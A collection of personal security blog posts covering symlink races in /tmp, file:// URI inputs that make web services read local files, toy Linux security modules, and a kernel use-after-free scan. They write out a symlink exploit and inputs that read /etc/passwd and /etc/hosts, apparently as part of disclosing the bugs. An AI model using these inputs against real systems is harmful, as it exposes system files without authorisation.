In practice this is a low risk issue, hence mentioning it, and filing the bug-report publicly, even if code execution is possible. Because in practice how many times do people fingerprint keys from unknown sources? Except for things like githubs key management page?

Some people probably do it, but I assume they do it infrequently and only after some minimal checking.

Anyway we'll say this is my my first security issue of 2015, we'll call it #roadhouse, and we'll get right on trademarking the term, designing the logo, and selling out for all the filthy filthy lucre ;)

| 3 comments

 

Finding and reporting trivial security issues

22 December 2015 21:50

This week I'll be mostly doing drive-by bug-reporting.

As with last year we start by using the Debian Code Search, to look for obviously broken patterns such as "system.>./tmp/.*"

Once we find a fun match we examine the code and then report the bugs we find. Today that was stalin which runs some fantastic things on startup:

(system "uname -m >/tmp/QobiScheme.tmp")
(system "rm -f /tmp/QobiScheme.tmp"))

We can exploit this like so:

$ ln -s /home/steve/HACK /tmp/QobiScheme.tmp
$ ls -l /home/steve/HACK
ls: cannot access /home/steve/HACK: No such file or directory

Now we run the script:

$ cd /tmp/stalin-0.11/benchmarks
$ ./make-hello

And we see this:

$ ls -l /home/steve/HACK
-rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK

For future reference the lsat looks horrifically bad

  • it writes multiple times to /tmp/lsat1.lsat and although it tries to detect races I'm not convinced. Something to look at in the future.

| No comments

 

If your code accepts URIs as input..

12 September 2016 21:50

There are many online sites that accept reading input from remote locations. For example a site might try to extract all the text from a webpage, or show you the HTTP-headers a given server sends back in response to a request.

If you run such a site you must make sure you validate the schema you're given - also remembering to do that if you're sent any HTTP-redirects.

Really the issue here is a confusion between URL & URI.

The only time I ever communicated with Aaron Swartz was unfortunately after his death, because I didn't make the connection. I randomly stumbled upon the html2text software he put together, which had an online demo containing a form for entering a location. I tried the obvious input:

file:///etc/passwd

The software was vulnerable, read the file, and showed it to me.

The site gives errors on all inputs now, so it cannot be used to demonstrate the problem, but on Friday I saw another site on Hacker News with the very same input-issue, and it reminded me that there's a very real class of security problems here.

The site in question was http://fuckyeahmarkdown.com/ and allows you to enter a URL to convert to markdown - I found this via the hacker news submission.

The following link shows the contents of /etc/hosts, and demonstrates the problem:

http://fuckyeahmarkdown.example.com/go/?u=file:///etc/hosts&read=1&preview=1&showframe=0&submit=go

The output looked like this:

..
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
fe80::1%lo0 localhost
127.0.0.1 stage
127.0.0.1 files
127.0.0.1 brettt..
..

In the actual output of '/etc/passwd' all newlines had been stripped. (Which I now recognize as being an artifact of the markdown processing.)

UPDATE: The problem is fixed now.

| 9 comments

 

Detecting fraudulent signups?

21 November 2016 21:50

I run a couple of different sites that allow users to sign-up and use various services. In each of these sites I have some minimal rules in place to detect bad signups, but these are a little ad hoc, because the nature of "badness" varies on a per-site basis.

I've worked in a couple of places where there are in-house tests of bad signups, and these usually boil down to some naive, and overly-broad, rules:

  • Does the phone numbers' (international) prefix match the country of the user?
  • Does the postal address supplied even exist?

Some places penalise users based upon location too:

  • Does the IP address the user submitted from come from TOR?
  • Does the geo-IP country match the users' stated location?
  • Is the email address provided by a "free" provider?

At the moment I've got a simple HTTP-server which receives a JSON post of a new users' details, and returns "200 OK" or "403 Forbidden" based on some very very simple critereon. This is modeled on the spam detection service for blog-comments server I use - something that is itself becoming less useful over time. (Perhaps time to kill that? A decision for another day.)

Unfortunately this whole approach is very reactive, as it takes human eyeballs to detect new classes of problems. Code can't guess in advance that it should block usernames which could collide with official ones, for example allowing a username of "admin", "help", or "support".

I'm certain that these systems have been written a thousand times, as I've seen at least five such systems, and they're all very similar. The biggest flaw in all these systems is that they try to classify users in advance of them doing anything. We're trying to say "Block users who will use stolen credit cards", or "Block users who'll submit spam", by correlating that behaviour with other things. In an ideal world you'd judge users only by the actions they take, not how they signed up. And yet .. it is better than nothing.

For the moment I'm continuing to try to make the best of things, at least by centralising the rules for myself I cut down on duplicate code. I'll pretend I'm being cool, modern, and sexy, and call this a micro-service! (Ignore the lack of containers for the moment!)

| No comments

 

Old packages are interesting.

9 February 2017 21:50

Recently Vincent Bernat wrote about writing his own simple terminal, using vte. That was a fun read, as the sample code built really easily and was functional.

At the end of his post he said :

evilvte is quite customizable and can be lightweight. Consider it as a first alternative. Honestly, I don’t remember why I didn’t pick it.

That set me off looking at evilvte, and it was one of those rare projects which seems to be pretty stable, and also hasn't changed in any recent release of Debian GNU/Linux:

  • lenny had 0.4.3-1.
  • etch had nothing.
  • squeeze had 0.4.6-1.
  • wheezy has release 0.5.1-1.
  • jessie has release 0.5.1-1.
  • stretch has release 0.5.1-1.
  • sid has release 0.5.1-1.

I wonder if it would be possible to easily generate a list of packages which have the same revision in multiple distributions? Anyway I had a look at the source, and unfortunately spotted that it didn't entirely handle clicking on hyperlinks terribly well. Clicking on a link would pretty much run:

 firefox '%s'

That meant there was an obvious security problem.

It is a great terminal though, and it just goes to show how short, simple, and readable such things can be. I enjoyed looking at the source, and furthermore enjoyed using it. Unfortunately due to a dependency issue it looks like this package will be removed from stretch.

| 2 comments

 

So I accidentally wrote a linux security module

2 June 2017 21:50

Tonight I read this weeks LWN quotes-page a little later than usual because I was busy at work for most of the day. Anyway as always LWNs content was awesome, and this particular list lead to an interesting discussion about a new Linux-Security-Module (LSM).

That read weirdly, what I was trying to say was that every Thursday morning I like to read LWN at work. Tonight is the first chance I had to get round to it.

One of the later replies in the thread was particularly interesting as it said:

Suggestion:

Create an security module that looks for the attribute

    security.WHITELISTED

on things being executed/mmapped and denys it if the attribute
isn't present. Create a program (whitelistd) that reads
/etc/whitelist.conf and scans the system to ensure that only
things on the list have the attribute.

So I figured that was a simple idea, and it didn't seem too hard even for myself as a non-kernel non-developer. There are several linux security modules included in the kernel-releases, beneath the top-level security/ directory, so I assumed I could copy & paste code around them to get something working.

During the course of all this work, which took about 90 minutes from start to Finnish (that pun never gets old), this online documentation was enormously useful:

Brief attr primer

If you're not familiar with the attr tool it's pretty simple. You can assign values to arbitrary labels on files. The only annoying thing is you have to use extra-flags to commands like rsync, tar, cp, etc, to preserve the damn things.

Set three attributes on the file named moi:

$ touch moi
$ attr -s forename -V "Steve"      moi
$ attr -s surname  -V "Kemp"       moi
$ attr -s name     -V "Steve Kemp" moi

Now list the attributes present:

$ attr -l moi
Attribute "name" has a 10 byte value for moi
Attribute "forename" has a 5 byte value for moi
Attribute "surname" has a 4 byte value for moi

And retrieve one?

$ attr -q -g name moi
Steve Kemp

LSM Skeleton

My initial starting point was to create "steve_lsm.c", with the following contents:

 #include <linux/lsm_hooks.h>

 /*
  * Log things for the moment.
  */
 static int steve_bprm_check_security(struct linux_binprm *bprm)
 {
     printk(KERN_INFO "STEVE LSM check of %s\n", bprm->filename);
     return 0;
 }

 /*
  * Only check exec().
  */
 static struct security_hook_list steve_hooks[] = {
     LSM_HOOK_INIT(bprm_check_security, steve_bprm_check_security),
 };

 /*
  * Somebody set us up the bomb.
  */
 static void __init steve_init(void)
 {
     security_add_hooks(steve_hooks, ARRAY_SIZE(steve_hooks), "steve");
     printk(KERN_INFO "STEVE LSM initialized\n");
 }

With that in place I had to modify the various KBuild files beneath security/ to make sure this could be selected as an LSM, and add in a Makefile to the new directory security/steve/.

With the boiler-plate done though, and the host machine rebooted into my new kernel it was simple to test things out.

Obviously the first step, post-boot, is to make sure that the module is active, which can be done in two ways, looking at the output of dmesg, and explicitly listing the modules available:

 ~# dmesg | grep STEVE | head -n2
 STEVE LSM initialized
 STEVE LSM check of /init

 $ echo $(cat /sys/kernel/security/lsm)
 capability,steve

Making the LSM functional

The next step was to make the module do more than mere logging. In short this is what we want:

  • If a binary is invoked by root - allow it.
    • Although note that this might leave a hole, if the user can enter a new namespace where their UID is 0..
  • If a binary is invoked by a non-root user look for an extended attribute on the target-file named security.WHITELISTED.
    • If this is present we allow the execution.
    • If this is missing we deny the execution.

NOTE we don't care what the content of the extended attribute is, we just care whether it exists or not.

Reading the extended attribute is pretty simple, using the __vfs_getxattr function. All in all our module becomes this:

  #include <linux/xattr.h>
  #include <linux/binfmts.h>
  #include <linux/lsm_hooks.h>
  #include <linux/sysctl.h>
  #include <linux/ptrace.h>
  #include <linux/prctl.h>
  #include <linux/ratelimit.h>
  #include <linux/workqueue.h>
  #include <linux/string_helpers.h>
  #include <linux/task_work.h>
  #include <linux/sched.h>
  #include <linux/spinlock.h>
  #include <linux/lsm_hooks.h>


  /*
   * Perform a check of a program execution/map.
   *
   * Return 0 if it should be allowed, -EPERM on block.
   */
  static int steve_bprm_check_security(struct linux_binprm *bprm)
  {
         // The current task & the UID it is running as.
         const struct task_struct *task = current;
         kuid_t uid = task->cred->uid;

         // The target we're checking
         struct dentry *dentry = bprm->file->f_path.dentry;
         struct inode *inode = d_backing_inode(dentry);

         // The size of the label-value (if any).
         int size = 0;

         // Root can access everything.
         if ( uid.val == 0 )
            return 0;

         size = __vfs_getxattr(dentry, inode, "user.whitelisted", NULL, 0);
         if ( size >= 0 )
         {
             printk(KERN_INFO "STEVE LSM check of %s resulted in %d bytes from 'user.whitelisted' - permitting access for UID %d\n", bprm->filename, size, uid.val );
             return 0;
         }

         printk(KERN_INFO "STEVE LSM check of %s denying access for UID %d [ERRO:%d] \n", bprm->filename, uid.val, size );
         return -EPERM;
  }

  /*
   * The hooks we wish to be installed.
   */
  static struct security_hook_list steve_hooks[] = {
       LSM_HOOK_INIT(bprm_check_security, steve_bprm_check_security),
  };

  /*
   * Initialize our module.
   */
  void __init steve_add_hooks(void)
  {
       /* register ourselves with the security framework */
       security_add_hooks(steve_hooks, ARRAY_SIZE(steve_hooks), "steve");

       printk(KERN_INFO "STEVE LSM initialized\n");
  }

Once again we reboot with this new kernel, and we test that the LSM is active. After the basic testing, as before, we can now test real functionality. By default no binaries will have the attribute we look for present - so we'd expect ALL commands to fail, unless executed by root. Let us test that:

~# su - nobody -s /bin/sh
No directory, logging in with HOME=/
Cannot execute /bin/sh: Operation not permitted

That looks like it worked. Let us allow users to run /bin/sh:

 ~# attr -s whitelisted -V 1 /bin/sh

Unfortunately that fails, because symlinks are weird, but repeating the test with /bin/dash works as expected:

 ~# su - nobody -s /bin/dash
 No directory, logging in with HOME=/
 Cannot execute /bin/dash: Operation not permitted

 ~# attr -s whitelisted -V 1 /bin/dash
 ~# attr -s whitelisted -V 1 /usr/bin/id

 ~# su - nobody -s /bin/dash
 No directory, logging in with HOME=/
 $ id
 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

 $ uptime
 -su: 2: uptime: Operation not permitted

And our logging shows the useful results as we'd expect:

  STEVE LSM check of /usr/bin/id resulted in 1 bytes from 'user.WHITELISTED' - permitting access for UID 65534
  STEVE LSM check of /usr/bin/uptime denying access for UID 65534 [ERRO:-95]

Surprises

If you were paying careful attention you'll see that we changed what we did part-way through this guide.

  • The initial suggestion said to look for security.WHITELISTED.
  • But in the kernel module I look for user.whitelisted.
    • And when setting the attribute I only set whitelisted.

Not sure what is going on there, but it was very confusing. It appears to be the case that when you set an attribute a secret user. prefix is added to the name.

Could be worth some research by somebody with more time on their hands than I have.

Anyway I don't expect this is a terribly useful module, but it was my first, and I think it should be pretty stable. Feedback on my code certainly welcome!

| 3 comments

 

Linux security modules, round two.

25 June 2017 21:50

So recently I wrote a Linux Security Module (LSM) which would deny execution of commands, unless an extended attribute existed upon the filesystem belonging to the executables.

The whitelist-LSM worked well, but it soon became apparent that it was a little pointless. Most security changes are pointless unless you define what you're defending against - your "threat model".

In my case it was written largely as a learning experience, but also because I figured it seemed like it could be useful. However it wasn't actually as useful because you soon realize that you have to whitelist too much:

  • The redis-server binary must be executable, to the redis-user, otherwise it won't run.
  • /usr/bin/git must be executable to the git user.

In short there comes a point where user alice must run executable blah. If alice can run it, then so can mallory. At which point you realize the exercise is not so useful.

Taking a step back I realized that what I wanted to to prevent was the execution of unknown/unexpected, and malicious binaries How do you identify known-good binaries? Well hashes & checksums are good. So for my second attempt I figured I'd not look for a mere "flag" on a binary, instead look for a valid hash.

Now my second LSM is invoked for every binary that is executed by a user:

  • When a binary is executed the sha1 hash is calculated of the files contents.
  • If that matches the value stored in an extended attribute the execution is permitted.
    • If the extended-attribute is missing, or the checksum doesn't match, then the execution is denied.

In practice this is the same behaviour as the previous LSM - a binary is either executable, because there is a good hash, or it is not, because it is missing or bogus. If somebody deploys a binary rootkit this will definitely stop it from executing, but of course there is a huge hole - scripting-languages:

  • If /usr/bin/perl is whitelisted then /usr/bin/perl /tmp/exploit.pl will succeed.
  • If /usr/bin/python is whitelisted then the same applies.

Despite that the project was worthwhile, I can clearly describe what it is designed to achieve ("Deny the execution of unknown binaries", and "Deny binaries that have been modified"), and I learned how to hash a file from kernel-space - which was surprisingly simple.

(Yes I know about IMA and EVM - this was a simple project for learning purposes. Public-key signatures will be something I'll look at next/soon/later. :)

Perhaps the only other thing to explore is the complexity in allowing/denying actions based on the user - in a human-readable fashion, not via UIDs. So www-data can execute some programs, alice can run a different set of binaries, and git can only run /usr/bin/git.

Of course down that path lies apparmour, selinux, and madness..

| 2 comments

 

Yet more linux security module craziness ..

29 June 2017 21:50

I've recently been looking at linux security modules. My first two experiments helped me learn:

My First module - whitelist_lsm.c

This looked for the presence of an xattr, and if present allowed execution of binaries.

I learned about the Kernel build-system, and how to write a simple LSM.

My second module - hashcheck_lsm.c

This looked for the presence of a "known-good" SHA1 hash xattr, and if it matched the actual hash of the file on-disk allowed execution.

I learned how to hash the contents of a file, from kernel-space.

Both allowed me to learn things, but both were a little pointless. They were not fine-grained enough to allow different things to be done by different users. (i.e. If you allowed "alice" to run "wget" you'd also allow www-data to do the same.)

So, assuming you wanted to do your security job more neatly what would you want? You'd want to allow/deny execution of commands based upon:

  • The user who was invoking them.
  • The path of the binary itself.

So your local users could run "bad" commands, but "www-data" (post-compromise) couldn't.

Obviously you don't want to have to recompile your kernel to change the rules of who can execute what. So you think to yourself "I'll write those rules down in a file". But of course reading a file from kernel-space is tricky. And parsing any list of rules, in a file, from kernel-space would prone to buffer-related problems.

So I had a crazy idea:

  • When a user attempts to execute a program.
  • Call back to user-space to see if that should be permitted.
    • Give the user-space binary the UID of the invoker, and the path to the command they're trying to execute.

Calling userspace? Every time a command is to be executed? Crazy. But it just might work.

One problem I had with this approach is that userspace might not even be available, when you're booting. So I setup a flag to enable this stuff:

# echo 1 >/proc/sys/kernel/can-exec/enabled

Now the kernel will invoke the following on every command:

/sbin/can-exec $UID $PATH

Because the kernel waits for this command to complete - as it reads the exit-code - you cannot execute any child-processes from it as you'd end up in recursive hell, but you can certainly read files, write to syslog, etc. My initial implementionation was as basic as this:

int main( int argc, char *argv[] )
{
...

  // Get the UID + Program
  int uid = atoi( argv[1] );
  char *prg = argv[2];

  // syslog
  openlog ("can-exec", LOG_CONS | LOG_PID | LOG_NDELAY, LOG_LOCAL1);
  syslog (LOG_NOTICE, "UID:%d CMD:%s", uid, prg );

  // root can do all.
  if ( uid == 0 )
    return 0;

  // nobody
  if ( uid == 65534 ) {
    if ( ( strcmp( prg , "/bin/sh" ) == 0 ) ||
         ( strcmp( prg , "/usr/bin/id" ) == 0 ) ) {
      fprintf(stderr, "Allowing 'nobody' access to shell/id\n" );
      return 0;
    }
  }

  fprintf(stderr, "Denied\n" );
  return -1;
}

Although the UIDs are hard-code it actually worked! Yay!

I updated the code to convert the UID to a username, then check executables via the file /etc/can-exec/$USERNAME.conf, and this also worked.

I don't expect anybody to actually use this code, but I do think I've reached a point where I can pretend I've written a useful (or non-pointless) LSM at last. That means I can stop.

 

bind9 considered harmful

11 July 2017 21:50

Recently there was another bind9 security update released by the Debian Security Team. I thought that was odd, so I've scanned my mailbox:

  • 11 January 2017
    • DSA-3758 - bind9
  • 26 February 2017
    • DSA-3795-1 - bind9
  • 14 May 2017
    • DSA-3854-1 - bind9
  • 8 July 2017
    • DSA-3904-1 - bind9

So in the year to date there have been 7 months, in 3 of them nothing happened, but in 4 of them we had bind9 updates. If these trends continue we'll have another 2.5 updates before the end of the year.

I don't run a nameserver. The only reason I have bind-packages on my system is for the dig utility.

Rewriting a compatible version of dig in Perl should be trivial, thanks to the Net::DNS::Resolver module:

These are about the only commands I ever run:

dig -t a    steve.fi +short
dig -t aaaa steve.fi +short
dig -t a    steve.fi @8.8.8.8

I should do that then. Yes.

| 8 comments

 

That time I didn't find a kernel bug, or did I?

14 August 2019 13:01

Recently I saw a post to the linux kernel mailing-list containing a simple fix for a use-after-free bug. The code in question originally read:

    hdr->pkcs7_msg = pkcs7_parse_message(buf + buf_len, sig_len);
    if (IS_ERR(hdr->pkcs7_msg)) {
        kfree(hdr);
        return PTR_ERR(hdr->pkcs7_msg);
    }

Here the bug is obvious once it has been pointed out:

  • A structure is freed.
    • But then it is dereferenced, to provide a return value.

This is the kind of bug that would probably have been obvious to me if I'd happened to read the code myself. However patch submitted so job done? I did have some free time so I figured I'd scan for similar bugs. Writing a trivial perl script to look for similar things didn't take too long, though it is a bit shoddy:

  • Open each file.
  • If we find a line containing "free(.*)" record the line and the thing that was freed.
  • The next time we find a return look to see if the return value uses the thing that was free'd.
    • If so that's a possible bug. Report it.

Of course my code is nasty, but it looked like it immediately paid off. I found this snippet of code in linux-5.2.8/drivers/media/pci/tw68/tw68-video.c:

    if (hdl->error) {
        v4l2_ctrl_handler_free(hdl);
        return hdl->error;
    }

That looks promising:

  • The structure hdl is freed, via a dedicated freeing-function.
  • But then we return the member error from it.

Chasing down the code I found that linux-5.2.8/drivers/media/v4l2-core/v4l2-ctrls.c contains the code for the v4l2_ctrl_handler_free call and while it doesn't actually free the structure - just some members - it does reset the contents of hdl->error to zero.

Ahah! The code I've found looks for an error, and if it was found returns zero, meaning the error is lost. I can fix it, by changing to this:

    if (hdl->error) {
        int err = hdl->error;
        v4l2_ctrl_handler_free(hdl);
        return err;
    }

I did that. Then looked more closely to see if I was missing something. The code I've found lives in the function tw68_video_init1, that function is called only once, and the return value is ignored!

So, that's the story of how I scanned the Linux kernel for use-after-free bugs and contributed nothing to anybody.

Still fun though.

I'll go over my list more carefully later, but nothing else jumped out as being immediately bad.

There is a weird case I spotted in ./drivers/media/platform/s3c-camif/camif-capture.c with a similar pattern. In that case the function involved is s3c_camif_create_subdev which is invoked by ./drivers/media/platform/s3c-camif/camif-core.c:

        ret = s3c_camif_create_subdev(camif);
        if (ret < 0)
                goto err_sd;

So I suspect there is something odd there:

  • If there's an error in s3c_camif_create_subdev
    • Then handler->error will be reset to zero.
    • Which means that return handler->error will return 0.
    • Which means that the s3c_camif_create_subdev call should have returned an error, but won't be recognized as having done so.
    • i.e. "0 < 0" is false.

Of course the error-value is only set if this code is hit:

    hdl->buckets = kvmalloc_array(hdl->nr_of_buckets,
                      sizeof(hdl->buckets[0]),
                      GFP_KERNEL | __GFP_ZERO);
    hdl->error = hdl->buckets ? 0 : -ENOMEM;

Which means that the registration of the sub-device fails if there is no memory, and at that point what can you even do?

It's a bug, but it isn't a security bug.

| 2 comments